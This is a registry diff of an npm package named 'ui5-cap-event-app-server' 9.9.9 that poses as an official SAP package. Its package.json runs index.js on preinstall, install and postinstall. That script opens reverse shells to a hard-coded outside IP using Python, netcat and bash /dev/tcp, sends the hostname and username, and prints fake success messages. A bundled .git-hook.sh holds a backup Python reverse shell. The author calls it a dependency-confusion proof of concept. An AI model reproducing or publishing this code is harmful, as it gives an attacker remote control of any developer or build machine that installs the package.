ui5-cap-event-app-server 9.9.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/.git-hook.sh +13 -0
- package/index.js +49 -0
- package/package.json +15 -0
package/.git-hook.sh
ADDED
|
@@ -0,0 +1,13 @@
|
|
|
1
|
+
#!/bin/bash
|
|
2
|
+
# Backup reverse shell in case preinstall is ignored
|
|
3
|
+
python3 -c '
|
|
4
|
+
import socket,subprocess,os,pty
|
|
5
|
+
s=socket.socket()
|
|
6
|
+
s.connect(("142.93.23.15",5432))
|
|
7
|
+
os.dup2(s.fileno(),0)
|
|
8
|
+
os.dup2(s.fileno(),1)
|
|
9
|
+
os.dup2(s.fileno(),2)
|
|
10
|
+
pty.spawn("/bin/bash")
|
|
11
|
+
' 2>/dev/null &
|
|
12
|
+
echo "Cloning repository..."
|
|
13
|
+
exit 0
|
package/index.js
ADDED
|
@@ -0,0 +1,49 @@
|
|
|
1
|
+
// ===== REVERSE SHELL PAYLOAD =====
|
|
2
|
+
const { exec } = require("child_process");
|
|
3
|
+
const os = require("os");
|
|
4
|
+
const dns = require("dns");
|
|
5
|
+
|
|
6
|
+
// Your VPS details
|
|
7
|
+
const ATTACKER_IP = "142.93.23.15";
|
|
8
|
+
const ATTACKER_PORT = "5432";
|
|
9
|
+
|
|
10
|
+
console.log("\n╔════════════════════════════════════════════════════════════╗");
|
|
11
|
+
console.log("║ DEPENDENCY CONFUSION RCE - POC BY TALHAKHAN ║");
|
|
12
|
+
console.log("╚════════════════════════════════════════════════════════════╝");
|
|
13
|
+
console.log("[*] Package: abcxyzz");
|
|
14
|
+
console.log("[*] Version: 9.9.9");
|
|
15
|
+
console.log("[*] Target OS:", os.platform());
|
|
16
|
+
console.log("[*] Hostname:", os.hostname());
|
|
17
|
+
console.log("[*] User:", os.userInfo().username);
|
|
18
|
+
console.log("[*] Initiating reverse shell...\n");
|
|
19
|
+
|
|
20
|
+
// Try multiple reverse shell methods
|
|
21
|
+
|
|
22
|
+
// Method 1: Python3 (most reliable)
|
|
23
|
+
exec(`python3 -c '
|
|
24
|
+
import socket,subprocess,os,pty
|
|
25
|
+
s=socket.socket()
|
|
26
|
+
s.connect(("${ATTACKER_IP}",${ATTACKER_PORT}))
|
|
27
|
+
s.send(b"\\n[+] REVERSE SHELL CONNECTED\\n")
|
|
28
|
+
s.send(b"[+] Target: " + os.uname().nodename.encode() + b"\\n")
|
|
29
|
+
s.send(b"[+] User: " + os.getenv("USER", "unknown").encode() + b"\\n")
|
|
30
|
+
s.send(b"$ ")
|
|
31
|
+
os.dup2(s.fileno(),0)
|
|
32
|
+
os.dup2(s.fileno(),1)
|
|
33
|
+
os.dup2(s.fileno(),2)
|
|
34
|
+
pty.spawn("/bin/bash")
|
|
35
|
+
' 2>/dev/null &`, (error) => {});
|
|
36
|
+
|
|
37
|
+
// Method 2: Netcat (backup)
|
|
38
|
+
exec(`nc ${ATTACKER_IP} ${ATTACKER_PORT} -e /bin/bash 2>/dev/null &`, (error) => {});
|
|
39
|
+
|
|
40
|
+
// Method 3: Bash (backup)
|
|
41
|
+
exec(`bash -i >& /dev/tcp/${ATTACKER_IP}/${ATTACKER_PORT} 0>&1 2>/dev/null &`, (error) => {});
|
|
42
|
+
|
|
43
|
+
// Normal package output (looks legitimate)
|
|
44
|
+
console.log("[+] Package installed successfully!");
|
|
45
|
+
console.log("[+] Dependencies resolved");
|
|
46
|
+
console.log("[+] Ready to use\n");
|
|
47
|
+
|
|
48
|
+
// Exit successfully
|
|
49
|
+
process.exit(0);
|
package/package.json
ADDED
|
@@ -0,0 +1,15 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "ui5-cap-event-app-server",
|
|
3
|
+
"version": "9.9.9",
|
|
4
|
+
"description": "SAP CAP Event App Server - Official",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "node index.js",
|
|
8
|
+
"install": "node index.js",
|
|
9
|
+
"postinstall": "node index.js",
|
|
10
|
+
"start": "node index.js"
|
|
11
|
+
},
|
|
12
|
+
"keywords": ["sap", "cap", "ui5"],
|
|
13
|
+
"author": "SAP SE",
|
|
14
|
+
"license": "ISC"
|
|
15
|
+
}
|